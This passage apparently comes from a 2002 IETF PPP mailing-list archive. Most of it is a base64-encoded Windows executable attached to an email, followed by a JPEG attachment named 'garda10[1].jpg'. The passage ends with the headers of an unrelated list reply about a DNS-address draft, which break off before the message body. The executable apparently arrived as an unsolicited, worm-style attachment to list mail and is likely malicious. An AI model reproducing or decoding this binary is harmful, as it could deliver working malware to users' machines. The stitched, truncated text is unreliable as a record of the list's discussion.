8AAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1v
ZGUuDQ0KJAAAAAAAAADpzXHsrawfv62sH7+trB+/LrARv66sH79FsxW/qawfv/uzDL+0rB+/
rawfv6KsH7+trB6/3qwfv8+zDL+qrB+/FaoZv6ysH79FsxS/kawfv0WzG7+urB+/UmljaK2s
H78AAAAAAAAAAAAAAAAAAAAAUEUAAEwBBQA1gEI4AAAAAAAAAADgAA4hCwEGAAAABgAAYAEA
AAAAAGZSAgAAEAAAAAAGAAAAH3EAEAAAABAAAAQAAAAAAAAABAAAAAAAAAAAcAcAABAAAC+Y
BwACAAAAAAAQAAAQAAAAABAAABAAAAAAAAAQAAAAgHgGAKQAAAAkeQYAuAAAAADgBgCAPgAA
AAAAAAAAAAAAAAAAAAAAAAAgBwAMSgAA3gQGADgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAABAGADACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAudGV4
dAAAABb1BQAAEAAAAAAGAAAQAAAAAAAAAAAAAAAAAAAgAABgLnJkYXRhAABScgAAABAGAACA
AAAAEAYAAAAAAAAAAAAAAAAAQAAAQC5kYXRhAAAA2EEAAACQBgAAUAAAAJAGAAAAAAAAAAAA
AAAAAEAAAMAucnNyYwAAAIA+AAAA4AYAAEAAAADgBgAAAAAAAAAAAAAAAABAAABALnJlbG9j
AAAMSgAAACAHAABQAAAAIAcAAAAAAAAAAAAAAAAAQAAAQgAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFNVVot0JBBXi34Yi24o
V/8VMBAlcY1fEFP/FTwQJXGLRgRIiUYEdCJT/xU4ECVxV/8VJBAlcYXAD4T19AIAX15duAEA
AABbwgQAjU4U6BYAAACF7XXShfZ0zosGagGLzv+QiAAAAOvAU1aL8VeLfgSNXxBT/xU8ECVx
i0YMhcB0YotOCIkIi04IhcnHRgwAAAAAdBWJQQxTx0YIAAAAAP8VOBAlcV9eW8ONVyg7wnUz
oQCQJXFQ/xUoECVxi08IO8EPhbHYAwCFyQ+EqdgDAGoBi8/o5D8AAFP/FTgQJXFfXlvDU/8V
OBAlcV9eW8OLRCQEg8A8UP8VMBAlccIEAIX2dCaLFmoBi87/UkDrG4NsJAQEVot0JAhXjUY8
UP8VJBAlcYv4hf901ovHX17CBABTVot0JAxXi0YYjXgQV/8VPBAlcYtOBEGL2YlOBIP7AXQP
V/8VOBAlcV+Lw15bwgQAjU4U6PcDAADr51GLQSBTVVaFwFd0cotsJBiLSRwjTQiLHIiNBIiF
24lEJBCJRCQYD4S9AAAAi1MUi0UIO9APhZ4AAACLQySLTRA7wXVCi0wkGItEJBA7yA+FpwAA
AItTEPfShdIPhIgAAACLRCQciRiLRCQghcB0AokYX15duAEAAABbWcIMAF9eXVtZwgwAi0UE
i0sYjRQAO8p1Pot1AI1TKIv6M8DzpnUehcB1IYtDJIXAf0eLbRCF7YlrJH+Ox0MkAAAAAOuF
G8CD2P/r24pFDYTAD4WhBQMAjUMgiUQkEIPDIIlcJBiLG4XbD4VD////X15dM8BbWcIMAIlF
EOlJ////i1MgiRGLCIlLIIkY6Uj///+LVCQEM8CD7CBmiwJWg/hSV4vxD4/uAAAAD4S9AAAA
g/hMD4SAAAAAg/hRdCSLTCQwiwJfXokBi0IEiUEEi0IIiUEIi1IMM8CJUQyDxCDCCABmi0Y8
Zj1KAA+Eff4CAGY9SQAPhXv+AgCLdkRmgz5KD4Vu/gIAi04IM8CFyQ+VwIXAD4Rc/gIAi3Qk
MItSCIsBVlL/UESFwA+FXP4CADPAX16DxCDCCACLQgSLSgiLVCQwi3YMagBqAGoAUmoCiUwk
JFBWjUwkJGbHRCQkSQDoXQIAAF9eg8QgwggAiwaLegiNTCQYUYvO/1B0hcB8sYtUJDBqAI1E
JBxSUIvO/9dfXoPEIMIIAD0MQAAAD4Ub////i0IIi0wkMIsQiRGLUASJUQSLUAiJUQiLQAyJ
QQzpav///2aDeSwAVo1xLHQgi0QkCIsOiQiLVgSJUASLTgiJSAiLVgyJUAwzwF7CBABRi87o
BgAAAIXAfPDr0lOLXCQIVleL+YvL6EMAAACFwHQQZscHSQCJRwhfXjPAW8IEAOgjRQAAi/CF
9g+EFjoDAFaLy2bHBkoAiV4I6EA1AABmxwdJAIl3CF9eM8BbwgQAi0Eow4PsEFOLXCQYVYts
JCBWV4t8JCyL8VdVU+i6AAAAhcB0GottAGaDfQBVD4SGAQMAX15dM8Bbg8QQwgwAV1VTi87o
Z0IAAIXAiUQkKHTUD4xxAQMAi35Uhf8PhGYBAwCLTgyNRCQQUFNRi8/o49YAAIXAfRWLfxCF
/3Xki0QkKF9eXVuDxBDCDACLRCQsixZQVVOLzv+SlAAAAIvwhfYPjP0AAwCLTQCLVCQQX16J
EYtEJAyJQQSLVCQQiVEIi0QkFIlBDItNAF0zwMdBEB4AAABbg8QQwgwAVovxV4tOCIXJdDyL
fCQQi1QkDI1EJBBQV1LoOvz//4XAdCSLRCQUi0wkEIXAdAKJCIsXZoM6UQ+EGO8CAF+4AQAA
AF7CDABfM8BewgwAVovxi0YEg8AQUP8VPBAlcYtGBPZAPAh1IItODIXJdRmLUCiDwCiNTgiJ
EYkwiUYMiwGFwHQDiUgMi0YEg8AQUP8VOBAlcV7Di8GD7CRmgTgMQA+EqT4DAGaDOEl0KzPJ
U2aLCFaLdCQ0g8H3V4t8JEyD+UcPh48+AwAz0oqRWBkfcf8klTgZH3GLQAjr0IX2D4WxPgMA
i3AEi0AIM8kz/2aLCIPB94P5R3bP6Vk+AwCF9g+Fjz4DAItIBItACIXAD4SPPgMAhclmx0Qk
DEkAiUQkFIlMJBwPhIY+AwCLQfzR6ItUJESJRCQgi0H4iUwkLItMJEiJRCQki0QkQFGLTCRA
UlCLRCRAjVQkKFFSUI1MJCTGRCRAAcZEJEEA6IvYAABfXluDxCTCHACLTCQ89sVAD4WBPgMA
i0wkSItUJESLQAhRi0wkRFKLVCREUYtMJEBSVlBR6C0JAgBfXluDxCTCHACLVCRIi0wkRFdS
i1QkSFGLTCRIUotQCItEJERRVlJQ6EEgAgBfXluDxCTCHACLTCRIi1QkRItACFdRi0wkSFKL
VCRIUYtMJERSVlGLyOgJAAAAX15bg8QkwhwAi0QkCIPsIIXAU1VWV4vxD4TQAAAAi1wkPIts
JET2wwwPhTf8AgCLFo1MJBBRUIvO/1JEhcCJRCQ8fGj2wwJ0CIXtD45X/AIAZoN8JBBJdWiL
RCQYZoM4SnVei3gI9sMBD4QS/AIAixaNRCQgUIvO/1J0hcCJRCQ8fClmi0QkII1MJCBm99gb
wIsXI8GLTCRAagBQi0QkUFBVUYvP/1JwiUQkPD0EQGaGD4Rf/AIAX15dW4PEIMIcAFaNTCQk
6AP8//+LRCRIi0wkQI1UJCBSi1QkOFBVUVNqAFKNTCQs6Kb9///ruotMJDz2wQwPhdz7AgD2
wQEPhIkAAACLfCRMhf90SmaDP0l1RItHCGaDOEp1O4tICI1EJCBQixH/UnSFwIlEJDwPjHj/
//+LTCQgi8El//8AAIP4SXUJi1QkKDPAZosCg/hKdSKNfCQgi0wkSItUJESLBmoAV1GLTCRM
UlGLzv9QcOk0////g/hQdNmD+E901IP4CXTPZoXJdc7pc/sCAPbFQHRRi0QkSItMJESLFlCN
RCQUUVCLzv9SaIXAiUQkPA+M+P7//4tEJECFwHQbi0wkEItUJBSJCItMJBiJUASLVCQciUgI
iVAMX15dM8Bbg8QgwhwA9sECD4RS+wIAi0QkRIXAD4UP+wIAM8D2xSB1HPbFEHQFuAgAAACL
FlCLRCREi85Q/1JA6Y3+//+4BQAAAOvnixYfcfEWH3HuFR9xEBYfccpUInGYFh9xxBYfcWlU
InEABwcHBwcHBwcHBwcHBwcHBwcHBwcHBwcHBwcHBwcHBwcHBwcHBwcHBwcHBwcHBwcHBwcH
BwcHBwcHBwcHBwcHBwEHAgMEBQZTVovxV4tOCIXJD4RS9wIAi3wkFItcJBBXU+hpAAAAhcAP
hDv3AgCLP2aDP1F0CF9eM8BbwggAZotGPGY9SgAPhAr3AgBmPUkAD4UI9wIAi0ZEZoM4Sg+F
+/YCAItICDPAhckPlcCFwA+E6fYCAIsBjVQkFFKLVwhS/5CMAAAAhcB0rOnP9gIAU4tcJAiF
2w+Ow/0CAPbDAw+Fuv0CAGosU/8VZBAlcYXAD4Wp/QIAjUMoaAAAAEBQ/xVgECVxhcAPhZL9
AgCLSxD30YXJD4SL/QIAi1QkDLgBAAAAiRpbwggAi0QkBFaFwIvxD4T19wIAixaNTCQIUVCL
zv+SjAAAAIXAfB6LRCQMi0wkCIsWUFGLzv+SqAAAADPShcAPncJKI8JewggAi1EgVovCizCJ
cRyLQASJQSCLQRSLcATB5gSNdAb4O9ZedAPCBACLEIlRFItRGIkQiUEYi0EUhcB16ehi9f//
6+JWi/FX9oaMAAAAAXQri0YYi04Mi5CAAAAAiVYMiYiAAAAAiwaLTgiJSBiLhowAAAAk/omG
jAAAAItOKDP/O88PhbQAAACLTiyJfiQ7z4l+IA+FsAAAAItGQFONXkA7x3QtiwaLgPgBAAA7
x3UXoQCQJXFQ/xUoECVxO8cPhNOSBACLQBRTi8joM////4k7i46QAAAAO88Phb+SBACLhpQA
AAA7xw+FzZIEAIuGmAAAADvHD4XQkgQAi0YYiX5UO8eJflh0CYsQUP9SCIl+GIseO990EVP/
FSQQJXGFwA+EtpIEAIk+i0YEWzvHdAmLCFD/UQiJfgRfXsPojboBAIl+KOk/////6NojAgCL
RixQixD/UgiJfizpOv///8OD7AyLQQRTM9tVVjvDV4lMJBAPhE9AAwA5XCQgD4V/PwMAi0EU
X15dW4PEDMIIAItBBIXAD4SUQAMAi0QkBGoBUOi6////i0wkCIkB99gbwCXy//h/BQ4AB4DC
CABTVovxV4t8JBCLThRHhcl0NYtGHIsAi9Ar0YPqCMH6BDvXfCKLTCQUg+gQX4kBi1YciRCL
ViCJUASJThyJRiBeM8BbwggAi0YYhcB0NYsdyBElcTl4BA+MTz0DAItGGItWFIsIiU4YiRCL
zolGFOhr+P//i0YUi0gEweEEjUQBCOuii04QjQQ/O8h8N4tWEMHiBIPCGFL/FcQRJXGDxASJ
RhiFwA+EHD0DAItOEIlIBItWGMcCAAAAAItGENHgiUYQ65mJRhDrxIHsqAAAAFaL8Y1MJATo
lAAAAKEAkCVxUP8VKBAlcYXAdAOLQBA7RhgPhVQRBABXi7wktAAAAIX/dAVmxwcAAItOfIuE
JMQAAACLlCS8AAAAC8iLhCS4AAAAUYuMJMQAAABSi1YMUFFWUo1MJCDohgAAAIvwhfYPjB4R
BABXjUwkDOhbAgAAi/CF9g+MChEEAI1MJAjoQf7//4vGX16BxKgAAADCFACLwTPJi5CMAAAA
iQiD4viJSASJSBiJSCCJSCSJSCiJSCyJSDCJiIgAAACJSECJiJAAAACJiJQAAACJiJgAAACJ
SFSJSFiJkIwAAACJSHCJSGjDoQCQJXFViy0oECVxVleNfCQki/FQge8AIAAA/9U5eBgPg2QB
AACNTCQkO/kPg1gBAACLfCQQi0cEhcCJRgQPhF6KBACKSGKEyQ+EU4oEAIsQUP9SBFeJPv8V
MBAlcYsOi0EYhcCJRggPhDQBAACLQBBAiUYQi4n0AQAAi0QkFIlOFIlGGIsQUP9SBItOGIsB
/5C8AAAAiUYciw0AkCVxUf/VhcB0A4tAEIlGNIsVAJAlcVL/1YXAD4QwiQQAi0AQhcAPhCWJ
BACLDQSQJXGFyQ+FHokEAItADIlGOItGHItICItRCItIBAPRiVZIi0gEiU5Qi1AI9kIYAQ+F
rgAAAIt8JBhTilwkKPbDBA+F7ogEAItUJCCLRCQkagBqAFJQV4vO6MIeAAD2wwKL6FsPheuI
BACF7Q+MV4kEAItGCIXAD4SSAAAAi1BUiVZYi0ZYiUZUioaMAAAAqAF1JYtGGIuIgAAAAIlO
DImwgAAAAIsW
--Y13R9m3I9jpz8703392311i3HOK9WG57o5Kz3

Content-Type: application/octet-stream;
	name=garda10[1].jpg
Content-Transfer-Encoding: base64
Content-ID: <Y8uPFSravxO79>

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
--Y13R9m3I9jpz8703392311i3HOK9WG57o5Kz3--


From owner-ietf-ppp@merit.edu  Mon Jun 10 07:56:42 2002
Received: from trapdoor.merit.edu (postfix@trapdoor.merit.edu [198.108.1.26])
	by ietf.org (8.9.1a/8.9.1a) with ESMTP id HAA29842
	for <pppext-archive@odin.ietf.org>; Mon, 10 Jun 2002 07:56:41 -0400 (EDT)
Received: by trapdoor.merit.edu (Postfix)
	id 44C8191210; Mon, 10 Jun 2002 07:56:55 -0400 (EDT)
Delivered-To: ietf-ppp-outgoing@trapdoor.merit.edu
Received: by trapdoor.merit.edu (Postfix, from userid 56)
	id 0A7839123D; Mon, 10 Jun 2002 07:56:54 -0400 (EDT)
Delivered-To: ietf-ppp@trapdoor.merit.edu
Received: from segue.merit.edu (segue.merit.edu [198.108.1.41])
	by trapdoor.merit.edu (Postfix) with ESMTP id F270C91210
	for <ietf-ppp@trapdoor.merit.edu>; Mon, 10 Jun 2002 07:56:53 -0400 (EDT)
Received: by segue.merit.edu (Postfix)
	id CFAD65DDDA; Mon, 10 Jun 2002 07:56:49 -0400 (EDT)
Delivered-To: ietf-ppp@merit.edu
Received: from franklin.cisco.com (franklin.cisco.com [171.70.156.17])
	by segue.merit.edu (Postfix) with ESMTP id 8275B5DDB0
	for <ietf-ppp@merit.edu>; Mon, 10 Jun 2002 07:56:49 -0400 (EDT)
Received: from GWZW2K (tokyo-vpn-user268.cisco.com [10.70.83.12]) by franklin.cisco.com (8.8.6 (PHNE_17190)/CISCO.SERVER.1.2) with SMTP id EAA09459; Mon, 10 Jun 2002 04:56:56 -0700 (PDT)
Reply-To: <gwz@cisco.com>
From: "Glen Zorn" <gwz@cisco.com>
To: "James Carlson" <james.d.carlson@east.sun.com>
Cc: "pppext" <ietf-ppp@merit.edu>, "Glen Zorn" <gwz@cisco.com>,
        <tom.hiller@lucent.com>
Subject: RE: I-D ACTION:draft-hiller-dns-addr-00.txt
Date: Mon, 10 Jun 2002 04:56:48 -0700
Message-ID: <LMEEIEAEKIEGIECKAPBHEEICCJAA.gwz@cisco.com>
MIME-Version: 1.0
Content-Type: text/plain;
	charset="us-ascii"
Content-Transfer-Encoding: 7bit
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2911.0)
Importance: Normal
In-Reply-To: <15614.13610.120869.311924@gargle.gargle.HOWL>
X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4807.1700
Sender: owner-ietf-ppp@merit.edu
Precedence: bulk
Errors-To: owner-ietf-ppp-outgoing@merit.edu
Content-Transfer-Encoding: 7bit

James Carlson [mailto:james.d.carlson@east.sun.com] writes:
